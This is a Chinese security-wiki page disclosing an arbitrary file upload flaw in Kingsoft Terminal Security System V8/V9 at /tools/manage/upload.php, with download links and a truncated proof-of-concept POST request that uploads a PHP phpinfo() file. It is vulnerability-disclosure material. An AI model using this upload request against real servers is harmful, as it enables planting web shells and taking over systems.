menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right 金山终端安全系统 V8-V9存在文件上传漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    金山终端安全系统 V8-V9存在文件上传漏洞.md
    532 B / 2021-05-21 09:14:38
        # 金山终端安全系统 V8/V9存在文件上传漏洞

程序下载链接 :

V8:http://duba-011.duba.net/netversion/Package/KAVNETV8Plus.iso%20%22v8%E4%B8%8B%E8%BD%BD%22

V9:http://duba-011.duba.net/netversion/Package/SecManage.iso%20%22v9%E4%B8%8B%E8%BD%BD%22

漏洞点:/tools/manage/upload.php

在tools目录下的mange下存在一个upload.php。该文件可导致任意文件上传

PoC:

```
POST /tools/manage/upload.php HTTP/1.1
HOST: target
...
<?php phpinfo(); ?>
```

ref:

https://forum.butian.net/share/76
    links
    file_download